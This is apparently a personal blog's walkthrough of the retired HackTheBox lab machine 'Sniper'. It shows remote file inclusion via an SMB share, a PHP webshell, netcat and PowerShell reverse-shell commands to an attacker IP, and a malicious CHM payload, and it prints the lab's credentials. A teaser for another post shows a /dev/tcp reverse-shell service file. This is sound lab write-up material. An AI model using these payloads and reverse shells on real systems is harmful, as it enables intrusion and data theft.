Skip to main content

Hackthebox.eu - Retired - Sniper

Hackthebox.eu - Retired - Sniper

Recon

As always I start with a simple UP/Down scan on all TCP ports to see what is open


# nmap -T4 -p- -oX ./nmapb.xml sniper.htb


Then Convert it to HTML to make it pretty

 xsltproc ./nmapb.xml -o nmapb.html



Then rescan the open ports with -A to finger OS/Services

nmap -T4 -A -p80,135,139,445,49667 sniper.htb -oX ./nmapf.xml


Then convert that to HTML too

 xsltproc ./nmapf.xml -o ./nmapf.html



Looks like we have a windows box with IIS on port 80 RPC and smb


Let’s see what we get when browsing the IIS

Blog from home page


And this login for “Client Portal”


Tried enrolling a new user with the name admin for possible account enumeration….


Nope, it just let me create it now problem





No anonymous access on smb


No access on RPC either


Exploit


Alight so I’ve poked around.

I think this might be susceptible to RFI


I found on the blog post this 


<li><a href="/blog?lang=blog-en.php">English</a></li>


Looks like we can use “?Lang” to call  other sites.


I started up a new tool I found about today called updog which is like simpleHTTPServer


# updog -d /root/Desktop/HTB/Sniper/ -p 80


And just tried to call my HTML output of nmap

http://sniper.htb/blog/?lang=http://10.10.14.48/nmapf.html



So I don’t see it calling out to my webserver to get the html file


I found this blog that says we might use smb to get around any filter that might be in place that was making a call via HTTP


http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html


So I started up an SmbServer

python /opt/impacket-master/examples/smbserver.py SHARE /root/Desktop/HTB/Sniper/ -smb2support


I added this from the blog to my /etc/samba/smbd.conf


[ica]

path = /var/www/html/pub

writable = no

guest ok = yes

guest only = yes

read only = yes

directory mode = 0555

force user = nobody


And changed my browser to point to


http://sniper.htb/blog/?lang=\\10.10.14.48\SHare\nmapf.html

I get this error message, but I do see


An SMB connection from sniper.htb to my smbserver


I fought with this for a while but the SMB connection using impacket’s smbserver.py kept closing and the PHP files weren’t loading. So I followed what in the blog to use the samba server in kali. I also moved over the newest kali OS at this point too.


I eventually got the PHP in the blog to open and let me poke around a bit



I found this interesting file under the /user folder


Db.php


Looks like a user/pass


So username: dbuser 

Password: 36mEAhz/B8xQ~2VM

Dbname: sniper


Playing around trying to get a better shell


I did get a POC for a pingback


My PHP code


<?php  shell_exec('ping 10.10.14.48');?>


Saved as rs.php



Does indeed get pingback from the server



This gets ping back with either exec() or shell_exec()


I found a much better php shell

https://github.com/WhiteWinterWolf/wwwolf-php-webshell/blob/master/webshell.php


I stuck this in my /var/www/html/pub share





So much cleaner and the cmd actually works


Happy Eddie Murphy GIF



So we have a user named chris


So we have no write access to the box at all, nowhere to store our powershell scripts or netcat to get a reverse shell


How ever we do still have our smb share 


I moved nc.exe to my smb share and then on the PHP shell


Net use X: \\10.10.14.48\ica


We can see it mapped the drive as X


Now we should be able to use netcat to get our reverse shell



Make sure we are listening on our Kali box


Then on the PHP Shell


X:\nc.exe 10.10.14.48 443 -e C:\Windows\System32\cmd.exe



And 



We gotsta shell!!!!!!







Now let’s try and get some info out of the DB we saw earlier.


For some reason I couldn’t get any response on from just the cmd

So I loaded it up in powershell


Used this string to connect


./mysql.exe --user=dbuser --password=36mEAhz/B8xQ~2VM  sniper


Since we saw the table was called users earlier I just did

Select * From users;



We know from the login.php 




Login.php the password is md5


id      username        email   password        trn_date

1       superuser       admin@sniper.co 6e573c8b25e9168e0c61895d821a3d57        2019-04-11 22:45:36


Popped that into a online hash decrypter

https://www.md5online.org/md5-decrypt.html



So user superuser

Password $uperpassw0rd



I tried getting some escalation with this account but couldn't’ get anything..


But what about the dbuser password?  36mEAhz/B8xQ~2VM


I wonder if maybe that might be the password for the chris account.


I tired to connect to the SMB share on sniper using chris and that password



Yup password reuse FTW!!!


This took me forever to find the commands and get the syntax right for this next part


Basically we are going to use powershell to save the credentials and then call a new netcat connection to our attacking box


powershell

$username = 'sniper\chris'

$password = '36mEAhz/B8xQ~2VM'

$securePassword = ConvertTo-SecureString $password -AsPlainText -Force

$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword

Invoke-Command  -Credential $credential -Computer localhost -ScriptBlock {\\10.10.14.48\ica\nc.exe 10.10.14.48 55555 -e C:\windows\system32\cmd.exe}



Connected!


Let’s get that user hash


type user.txt

21f************************************



Looking around I found a directory under C:\ named Docs


It contains a TXT and a nice note from the CEO


I also found an instructions.chm under the downloads folder.


What is a CHM file you ask?


Basically a help file that is really just so HTML pages

https://en.wikipedia.org/wiki/Microsoft_Compiled_HTML_Help


Cool how do you read a CHM file from command line?


You can use hh.exe which is included with windows…. How nice of them


https://stackoverflow.com/questions/7603637/decompiling-chm-file-hh-exe-requires-only-the-filename-no-full-path-is-allowed


Here is the output of the decompressed file


>hh.exe -decompile output instructions.chm


C:\temp\output>type a.html

type a.html

<html>

<body>

<h1>Sniper Android App Documentation</h1>


<h2>Table of Contents</h2>


<p>Pff... This dumb CEO always makes me do all the shitty work. SMH!</p>

<p>I'm never completing this thing. Gonna leave this place next week. Hope someone snipes him.</p>

</body>

</html>



But what might be more interesting than that is that you can open web pages with hh.exe also, since it is essentially just reading HTML files….


And you might be able to use HH.exe to bypass AV if they don’t scan what it opens...



I wanted to get the instructions.chm to my samba share so I had to make some changes to  the config file and restart the service


I added



[ica]


path = /var/www/html/pub



public = yes

browseable = yes

create mask = 0777

read only = no

directory mode = 0777

force user = root


Then restarted the service


Service smbd restart



Now I can copy this file to my samba share



I went ahead and gabbed the txt file from the other directory too




I found this blog to get this next part going


https://gist.github.com/mgeeky/cce31c8602a144d8f2172a73d510e0e7


I modified it at first just to ping back to my kali box


I inserted this to the HTML of a decompiled chm file I had on my windows box( It was nvidia CHM). Then saved the file as ping.htm



<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>

  <PARAM name="Command" value="ShortCut">

  <PARAM name="Button" value="Bitmap::shortcut">

  <PARAM name="Item1" value=',cmd.exe,/c ping 10.10.14.48'>

  <PARAM name="Item2" value="273,1,1">

</OBJECT>

<SCRIPT>

  x.Click();

</SCRIPT>




Created a project.hpp


WIth this inside


[OPTIONS]


[FILES]

C:\Users\*********\Desktop\chm\ping.htm


Compiled it using 


C:\Users\*********\Desktop\chm\output>"C:\Program Files (x86)\HTML Help Workshop\hhc.exe" Project.hpp



Copied it over to my kali box


Then I copied it into the directory the boss told me to put the documentation in.

C:\docs



And  I got a ping back, which I assume happens when the boss opened the chm file to look at my documentation :)


Now we just need to get it to execute something so we can get a shell as our boss once he opens the documentation.



I spent a lot of time here trying to get this shell back, but it seems like even though it executes the chm file as the boss, there isn’t actually a session for me to grab hold of here… 



So what about just writing the file out to a place we can read.


I put this line in my HTML file

  <PARAM name="Item1" value=',cmd.exe, /c type C:\Users\administrator\Desktop\root.txt > C:\temp\root.txt'>

Recompiled my CHM

Renamed it to Project-type.chm


Moved it to my SMB



Copied it to C:\docs


After a minute my chm disappeared as is the usual for chm files in the C:\docs directory. Which emulates the box reading the documentation and moving it to another location.



Then in the C:\temp folder we created we see our root.txt



Now we can read it !!!!!



John Huston Dude GIF by Warner Archive


I know that technically we could use this to completely take over the box, but it just feels cheap writing out the root.txt to a location we can read.
Labels:

Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more